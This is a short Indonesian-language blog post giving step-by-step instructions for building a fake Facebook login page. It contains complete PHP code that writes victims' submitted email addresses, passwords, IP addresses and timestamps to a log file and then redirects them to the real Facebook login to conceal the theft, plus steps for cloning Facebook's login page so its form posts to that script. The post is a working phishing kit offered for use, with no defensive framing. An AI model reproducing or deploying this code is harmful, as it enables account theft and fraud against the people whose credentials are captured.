Cara Membuat Fake Login Facebook


1.Buka Notepad --> Masukan script dibawah

<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
 
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
</script>";
?>
Simpan dengan logs.php
Nah Sekarang Log out dari FB Kalian, terus Pas di halaman index/login Tekan Ctrl + U (View Source)
Copy Semua Script Ke Notepad


Cari https://login.facebook.com/login.php?login_attempt=1\ (Pake Ctrl+F) Terus Ganti Jadi logs.php

Sekarang Simpan dengan format .php <-- index.php

Dan Jangan lupa buat .txt <-- logs.txt

SUMBER: devil-scream.cyber4rt.com
Previous
Next Post »